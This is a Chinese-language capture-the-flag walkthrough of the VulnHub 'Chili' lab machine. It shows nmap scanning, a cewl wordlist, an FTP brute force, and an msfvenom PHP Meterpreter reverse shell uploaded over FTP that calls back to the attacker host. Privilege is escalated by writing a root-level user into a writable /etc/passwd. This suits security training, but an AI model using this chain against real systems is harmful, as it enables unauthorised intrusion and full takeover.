刚刚在VulnHub官网上找了些简单的靶机,感觉这个还挺适合新手的
首先使用工具扫描靶机所在网段,得到靶机IP:
root@kali:/# nmap -sP 192.168.200.129/24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-05 08:56 CST Nmap scan report for 192.168.200.1 Host is up (0.00016s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 192.168.200.2 Host is up (0.00012s latency). MAC Address: 00:50:56:E6:47:0B (VMware) Nmap scan report for 192.168.200.128 Host is up (0.00075s latency). MAC Address: 00:0C:29:4A:31:59 (VMware) Nmap scan report for 192.168.200.130 Host is up (0.00097s latency). MAC Address: 00:0C:29:1C:DC:AB (VMware) Nmap scan report for 192.168.200.254 Host is up (0.00092s latency). MAC Address: 00:50:56:FA:DC:49 (VMware) Nmap scan report for 192.168.200.129 Host is up. Nmap done: 256 IP addresses (6 hosts up) scanned in 27.85 seconds得到靶机IP后对靶机进行端口扫描:
root@kali:/# nmap -sT -p1-65535 192.168.200.130 Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-05 08:58 CST Nmap scan report for 192.168.200.130 Host is up (0.00056s latency). Not shown: 65533 closed ports PORT STATE SERVICE 21/tcp open ftp 80/tcp open http MAC Address: 00:0C:29:1C:DC:AB (VMware) Nmap done: 1 IP address (1 host up) scanned in 1.93 seconds我们发现靶机开启了21,80端口,我们先对靶机web服务进行访问
这里访问源码可以看到有一些单词的提示,我们这里使用cewl工具对网页敏感信息进行爬取并保存到文件当中
cewl http://192.168.200.130 > user.txt将user.txt中的文件内容进行大小写复写
然后可以通过九头蛇工具爆破ftp或者msf工具爆破
这里爆破后得到账号密码chili:a1b2c3d4,登录靶机ftp:
root@kali:/# ftp 192.168.200.130 Connected to 192.168.200.130. 220 (vsFTPd 3.0.3) Name (192.168.200.130:root): chili 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp>通过尝试,发现可以访问网站根目录:
ftp> pwd 257 "/home/chili" is the current directory ftp> cd /var/www/html/ 250 Directory successfully changed. ftp> pwd 257 "/var/www/html" is the current directory ftp>然后查看当前目录的文件,发现我们拥有对.nano目录的读写执行权:
ftp> ls -al 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 4 0 0 4096 Sep 08 13:12 . drwxr-xr-x 3 0 0 4096 Sep 08 11:41 .. drwxrwxrwx 2 0 0 4096 Oct 03 04:25 .nano drwxr-xr-x 2 0 0 4096 Sep 08 13:12 .vim -rw-r--r-- 1 0 0 74290 Oct 23 2018 Chile_WEB.jpg -rw-r--r-- 1 0 0 657 Sep 08 11:44 index.html 226 Directory send OK. ftp>然后我们直接将木马上传到服务器的.nano目录下:
// 先生成木马 root@kali:/# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.200.129 LPORT=4444 -f raw > shell.php [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload [-] No arch selected, selecting arch: php from the payload No encoder specified, outputting raw payload Payload size: 30691 bytes // 通过put命令上传木马: ftp> put /shell.php shell.php local: /shell.php remote: shell.php 200 PORT command successful. Consider using PASV. 150 Ok to send data. 226 Transfer complete. 30691 bytes sent in 0.00 secs (186.4281 MB/s) ftp> ls -al 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxrwxrwx 2 0 0 4096 Oct 04 21:36 . drwxr-xr-x 4 0 0 4096 Sep 08 13:12 .. -rw-r--r-- 1 1000 1000 0 Sep 08 13:14 index.html -rw------- 1 1000 1000 30691 Oct 04 21:36 shell.php 226 Directory send OK. ftp> // 这里需要注意,一定要给我们的木马777的权限 ftp> chmod 777 shell.php 200 SITE CHMOD command ok. ftp> ls -al 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxrwxrwx 2 0 0 4096 Oct 04 21:36 . drwxr-xr-x 4 0 0 4096 Sep 08 13:12 .. -rw-r--r-- 1 1000 1000 0 Sep 08 13:14 index.html -rwxrwxrwx 1 1000 1000 30691 Oct 04 21:36 shell.php 226 Directory send OK. ftp>成功上传后,这里我们通过msf反弹shell,在kali端口开启端口监听,然后通过浏览器访问我们的木马:
msf5 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf5 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp payload => php/meterpreter_reverse_tcp msf5 exploit(multi/handler) > set LHOST 192.168.200.129 LHOST => 192.168.200.129 msf5 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.200.129:4444这里我们成功拿到靶机的webshell,但是权限不高,我们得进行提权操作:
msf5 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.200.129:4444 [*] Meterpreter session 1 opened (192.168.200.129:4444 -> 192.168.200.131:37610) at 2020-10-05 09:43:42 +0800 meterpreter > getuid Server username: www-data (33) meterpreter >我们这里上传一个检测提权的工具,在靶机上运行:
ftp> put /root/enumy64 enumy64 local: /root/enumy64 remote: enumy64 200 PORT command successful. Consider using PASV. 150 Ok to send data. 226 Transfer complete. 1010192 bytes sent in 0.03 secs (31.9555 MB/s) ftp> chmod 777 enumy64 200 SITE CHMOD command ok. ftp> ls -al 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxrwxrwx 2 0 0 4096 Oct 04 21:46 . drwxr-xr-x 4 0 0 4096 Sep 08 13:12 .. -rwxrwxrwx 1 1000 1000 1010192 Oct 04 21:46 enumy64 -rw-r--r-- 1 1000 1000 0 Sep 08 13:14 index.html -rwxrwxrwx 1 1000 1000 30691 Oct 04 21:36 shell.php 226 Directory send OK. ftp>得到以下信息:
meterpreter > shell Process 672 created. Channel 0 created. pwd /var/www/html/.nano ./enumy64 ▄█▀─▄▄▄▄▄▄▄─▀█▄ _____ ▀█████████████▀ | __|___ _ _ _____ _ _ █▄███▄█ | __| | | | | | | █████ |_____|_|_|___|_|_|_|_ | █▀█▀█ |___| https://github.com/luke-goddard/enumy Current User Info uid=33(www-data) gid=33(www-data) groups=33(www-data) Version Linux version 4.19.0-10-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.132-1 (2020-07-24) hostname chili Umask u=rwx,g=rx,o=rx Last Login ---------- Username Port From Latest root tty1 Tue Sep 8 13:11:53 -0400 2020 chili tty1 Tue Sep 8 13:12:50 -0400 2020 User Accounts ------------- root:x:0:0:root:/root:/bin/bash sync:x:4:65534:sync:/bin:/bin/sync chili:x:1000:1000:chili,,,:/home/chili:/bin/bash Who Else Is Logged On --------------------- 21:48:00 up 13 min, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT Groups ------ uid=0(root) gid=0(root) groups=0(root) uid=1(daemon) gid=1(daemon) groups=1(daemon) uid=2(bin) gid=2(bin) groups=2(bin) uid=3(sys) gid=3(sys) groups=3(sys) uid=4(sync) gid=65534(nogroup) groups=65534(nogroup) uid=5(games) gid=60(games) groups=60(games) uid=6(man) gid=12(man) groups=12(man) uid=7(lp) gid=7(lp) groups=7(lp) uid=8(mail) gid=8(mail) groups=8(mail) uid=9(news) gid=9(news) groups=9(news) uid=10(uucp) gid=10(uucp) groups=10(uucp) uid=13(proxy) gid=13(proxy) groups=13(proxy) uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=34(backup) gid=34(backup) groups=34(backup) uid=38(list) gid=38(list) groups=38(list) uid=39(irc) gid=39(irc) groups=39(irc) uid=41(gnats) gid=41(gnats) groups=41(gnats) uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup) uid=101(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync) uid=102(systemd-network) gid=103(systemd-network) groups=103(systemd-network) uid=103(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve) uid=1000(chili) gid=1000(chili) groups=1000(chili),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev) uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump) uid=104(messagebus) gid=110(messagebus) groups=110(messagebus) uid=105(sshd) gid=65534(nogroup) groups=65534(nogroup) uid=106(ftp) gid=113(ftp) groups=113(ftp) Severity: MEDIUM Name: sysctl ptrace is configured insecurly -rw-r--r-- 1 root root 0 Oct 4 21:48 /proc/sys/kernel/yama/ptrace_scope Severity: INFO Name: Found an new root user with UID 0: root -rw-r--rw- 1 root root 1450 Sep 8 12:23 /etc/passwd Severity: INFO Name: Found an new root user with GID 0: root -rw-r--rw- 1 root root 1450 Sep 8 12:23 /etc/passwd Severity: INFO Name: Found an new user that can be logged into: root -rw-r--rw- 1 root root 1450 Sep 8 12:23 /etc/passwd Severity: INFO Name: Found an new user that can be logged into: sync -rw-r--rw- 1 root root 1450 Sep 8 12:23 /etc/passwd Severity: HIGH Name: Found a home directory that does not exist, but is attached to an existing user Severity: HIGH Name: Found a home directory that does not exist, but is attached to an existing user Severity: HIGH Name: Found a home directory that does not exist, but is attached to an existing user Severity: HIGH Name: Found a home directory that does not exist, but is attached to an existing user Severity: HIGH Name: Found a home directory that does not exist, but is attached to an existing user Severity: HIGH Name: Found a home directory that does not exist, but is attached to an existing user Severity: HIGH Name: Found a home directory that does not exist, but is attached to an existing user Severity: HIGH Name: Found a home directory that does not exist, but is attached to an existing user Severity: HIGH Name: Found a home directory that does not exist, but is attached to an existing user Severity: INFO Name: Found an new user that can be logged into: chili -rw-r--rw- 1 root root 1450 Sep 8 12:23 /etc/passwd Severity: HIGH Name: Found a home directory that does not exist, but is attached to an existing user Severity: HIGH Name: Found a home directory that does not exist, but is attached to an existing user Severity: HIGH Name: Low entropy file that could be a private key -rw-r--r-- 1 root root 20661 Feb 11 2019 /usr/share/X11/xkb/symbols/pk Severity: INFO Name: Config file could contain passwords -rw-r--r-- 1 root root 494 Feb 10 2019 /usr/share/libc-bin/nsswitch.conf Severity: HIGH Name: CAP_NET_RAW capablities enabled on file -rwxr-xr-x 1 root root 69368 Jan 13 2020 /usr/bin/ping Severity: MEDIUM Name: Executable capable of spawning reverse shells found -rwxr-xr-x 1 root root 1168776 Apr 18 2019 /usr/bin/bash Severity: MEDIUM Name: Executable capable of spawning reverse shells found -rwxr-xr-x 1 root root 736776 Apr 20 16:23 /usr/bin/openssl Severity: MEDIUM Name: Executable capable of spawning reverse shells found -rwxr-xr-x 2 root root 3201864 Jul 21 15:27 /usr/bin/perl Severity: MEDIUM Name: Executable capable of spawning reverse shells found -rwxr-xr-x 1 root root 8156 Jul 21 15:27 /usr/bin/cpan Severity: MEDIUM Name: Abnormal GUID enabled executable found -rwxr-sr-x 1 root crontab 43568 Oct 11 2019 /usr/bin/crontab Severity: MEDIUM Name: Abnormal GUID enabled executable found -rwxr-sr-x 1 root tty 14736 May 4 2018 /usr/bin/bsd-write Severity: MEDIUM Name: Abnormal SUID enabled executable found -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device Severity: INFO Name: Config file could contain passwords -rw-r--r-- 1 root root 239 Sep 27 2017 /usr/lib/tmpfiles.d/passwd.conf Severity: MEDIUM Name: Found backup /etc/shadow file -rw-r----- 1 root shadow 965 Sep 8 12:10 /etc/shadow- Severity: INFO Name: Found backup /etc/passwd file -rw-r--r-- 1 root root 1437 Sep 8 12:10 /etc/passwd- Severity: MEDIUM Name: Other permissions are higher than Group permissions -rw-r--rw- 1 root root 1450 Sep 8 12:23 /etc/passwd Severity: INFO Name: Config file could contain passwords -rw-r--r-- 1 root root 5849 Sep 8 12:15 /etc/vsftpd.conf Severity: INFO Name: Config file could contain passwords -rw-r--r-- 1 root root 494 Feb 10 2019 /etc/nsswitch.conf Generating JSON Json saved at location -> enumy.json Total files scanned -> 25183通过以上信息,我们发现我们对/etc/passwd文件有写的权限,这里我们可以直接添加一个高权限用户进去:
// 首先通过perl语言生成test用户的密码密文 root@kali:/# /usr/bin/perl -le 'print crypt("test","test")' teH0wLIpW0gyQ // 将自己构造的用户写入/etc/passwd下 meterpreter > shell Process 783 created. Channel 2 created. echo "test:teH0wLIpW0gyQ:0:0:root:/root:/bin/bash" > /etc/passwd切换test用户得到flag值:
meterpreter > shell Process 788 created. Channel 4 created. su test Password: test whoami test ls /root proof.txt cat /root/proof.txt Sun_CSR.Chili.af6d45da1f1181347b9e2139f23c6a5b